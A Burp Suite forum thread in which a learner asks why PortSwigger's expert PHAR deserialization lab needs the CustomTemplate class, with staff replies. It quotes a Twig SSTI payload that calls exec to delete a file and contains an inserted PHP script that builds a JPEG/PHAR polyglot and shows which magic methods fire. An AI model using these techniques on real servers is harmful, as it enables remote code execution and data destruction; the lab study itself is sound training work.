The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Why Do I need the CustomTemplate class to solve PHAR deserialization lab?

Guillaume | Last updated: Nov 13, 2023 04:23PM UTC

To solve the lab, I need to upload a polyglot JPG with malicious code inside. To do this, I used this tool: https://github.com/kunte0/phar-jpg-polyglot Then, once the phar JPG file is uploaded to the server, I need to call it through the phar:// stream. It is trivial to find the right path. NB: If I add a %00 to the path, the server returns an error and indicates the usage of file_exists, so if my understanding is correct, it means all serialized objects inside the JPG file will be deserialized. Then, it is possible to download the source code inside the cgi-bin folder. I see that the class Blog has the magic method __wakeup with an SSTI vulnerability inside. So, if I serialize the following code inside my JPG file thanks to the phar-jpg-polyglot project: class Blog {} $object = new Blog(); $object->user = 'carlos'; $object->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}'; It is supposed to work, no? But it is not the case, and I need to use the class CustomTemplate and I don't understand why.
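Added example, not code from this thread, from the lab, or from the phar-jpg-polyglot tool: a stand-alone PHP script that builds a PHAR whose stub starts with JPEG bytes, stores a serialized object in its metadata, and then shows which magic methods actually run when the archive is reached through phar:// with file_exists(). The classes Probe and Holder are hypothetical stand-ins; they are not the lab's Blog or CustomTemplate. The general point it demonstrates is that phar:// access only deserializes the metadata (so __wakeup runs), and any behaviour that lives in another magic method such as __toString needs a second gadget that invokes it.

```php
<?php
// Added example (hypothetical classes, not the lab's source).
// Run with:  php -d phar.readonly=0 phar_trigger_demo.php
// Assumes PHP 7.x: from PHP 8.0 on, metadata is no longer unserialized
// automatically on phar:// access (only Phar::getMetadata() does it), so
// the file_exists() trigger below prints nothing on PHP 8.

if (!Phar::canWrite()) {
    fwrite(STDERR, "phar.readonly is on; run with -d phar.readonly=0\n");
    exit(1);
}

// Stand-in for a class with "interesting" magic methods.
class Probe {
    public $name = '';
    public function __wakeup()   { echo "[Probe {$this->name}] __wakeup\n"; }
    public function __toString() { echo "[Probe {$this->name}] __toString\n"; return $this->name; }
    public function __destruct() { echo "[Probe {$this->name}] __destruct\n"; }
}

// Stand-in for a gadget whose destructor pushes a property through a string
// context: file_exists() needs a string, so "$this->inner . '.lock'" calls
// __toString() on whatever object was stored in $inner.
class Holder {
    public $inner = null;
    public function __destruct() {
        @file_exists($this->inner . '.lock');
    }
}

/**
 * Build a PHAR whose stub begins with JPEG bytes and whose metadata is $payload.
 * Phar::__construct() insists on a .phar extension, so the archive is written
 * under a .phar name and then renamed; phar:// opens it regardless of the
 * extension because it looks for the __HALT_COMPILER(); marker, not the name.
 * A distinct temporary name per build matters: PHP caches opened archives by
 * filename for the rest of the request, so reusing a name would reuse the
 * first archive's manifest and metadata.
 */
function buildPolyglot(string $finalPath, $payload): void {
    $tmp = $finalPath . '.phar';
    @unlink($tmp);
    @unlink($finalPath);
    $phar = new Phar($tmp);
    $phar->startBuffering();
    // Only the SOI/APP0 markers here. A real polyglot (as the tool linked in the
    // post produces) uses a complete JPEG so that image checks such as
    // getimagesize() still pass; PHP only requires the halt marker in the stub.
    $phar->setStub("\xFF\xD8\xFF\xE0\x00\x10JFIF\x00" . "<?php __HALT_COMPILER(); ?>");
    $phar->addFromString('x.txt', 'x');
    $phar->setMetadata($payload);   // serialized into the manifest
    $phar->stopBuffering();
    unset($phar);
    rename($tmp, $finalPath);
}

// Case 1: the Probe alone. file_exists() on the phar:// path parses the manifest
// and unserializes the metadata, so __wakeup runs. Nothing converts the object
// to a string, so __toString does not run.
$alone = new Probe();
$alone->name = 'alone';
buildPolyglot('/tmp/alone.jpg', $alone);
echo "-- file_exists on phar://alone --\n";
var_dump(file_exists('phar:///tmp/alone.jpg/x.txt'));

// Case 2: the Probe wrapped in a Holder. __wakeup runs as before; when the
// Holder is destroyed, its destructor stringifies the Probe, so __toString
// runs as well. The loaded archive (and so the Holder) is released when PHP
// tears down its phar cache, at the latest at script shutdown.
$wrapped = new Holder();
$wrapped->inner = new Probe();
$wrapped->inner->name = 'wrapped';
buildPolyglot('/tmp/wrapped.jpg', $wrapped);
echo "-- file_exists on phar://wrapped --\n";
var_dump(file_exists('phar:///tmp/wrapped.jpg/x.txt'));

// Everything printed after this marker comes from shutdown: the destructors of
// the objects loaded from the archives, and of the builder's own copies.
echo "-- shutdown --\n";
```

Reading the output: the "[Probe alone] __wakeup" line appears immediately after the first file_exists(), with no __toString for that object at any point; "[Probe wrapped] __toString" appears only because Holder::__destruct() forced the conversion. The same reasoning applies to any target: identify which magic method the phar:// access reaches directly (__wakeup, and later __destruct) and which ones need another class on the server to call them.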

Michelle, PortSwigger Agent | Last updated: Nov 14, 2023 10:33AM UTC

Hi, have you tried following along with the Community solution video? This goes into a bit more detail on the steps, so it might help you piece together the bits of information and understand why certain steps are needed.

Guillaume | Last updated: Nov 14, 2023 07:28PM UTC

Yes, I read the solution and saw the related videos, and I don't understand the explanation concerning the usage of the class CustomTemplate. I don't understand why I cannot use the Blog class alone. With the __wakeup method, if I serialize a Blog object inside the JPG phar file and use the phar:// stream on the image, because the avatar webpage uses file_exists, the Blog object should be deserialized and the SSTI executed, but it is not the case.

Michelle, PortSwigger Agent | Last updated: Nov 15, 2023 03:39PM UTC

Hi, thanks for the update. We'll have a chat with the team and get back to you shortly.

Michelle, PortSwigger Agent | Last updated: Nov 17, 2023 01:36PM UTC

Hi, I've had a quick look at this lab with the team. In step 2, "In Burp Repeater, request GET /cgi-bin to find an index that shows a Blog.php and CustomTemplate.php file. Obtain the source code by requesting the files using the .php~ backup extension", we find that the files referenced, and so the classes declared within them, already exist and are referenced on the server. Using this information you can infer how the blog is set up and look into swapping out some of the classes with your own. There are a few other labs, such as 'Arbitrary object injection in PHP' (https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-arbitrary-object-injection-in-php), that also use a similar setup, so if you've not already worked through the other labs this may help deepen your understanding.

Guillaume | Last updated: Nov 17, 2023 03:42PM UTC

I downloaded the source code and I don't have any problem with this. My problem is I don't understand why I need the CustomTemplate object to initiate the gadget chain. If I serialize the following code inside my JPG file thanks to the phar-jpg-polyglot project: class Blog {} $object = new Blog(); $object->user = 'carlos'; $object->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}'; It is supposed to work, no? But it is not the case, and I need to use the class CustomTemplate and I don't understand why.

Michelle, PortSwigger Agent | Last updated: Nov 20, 2023 10:25AM UTC

Hi, I'm afraid we can't provide dedicated mentoring for individual labs. This is one of the expert-level labs, so it is designed to require more investigation to find the solution. Web applications work in arbitrary ways, and with this lab we're trying to provide more challenges around working out what's happening within the application and why, and then in turn figuring out how it can be exploited.

Guillaume | Last updated: Nov 20, 2023 10:04PM UTC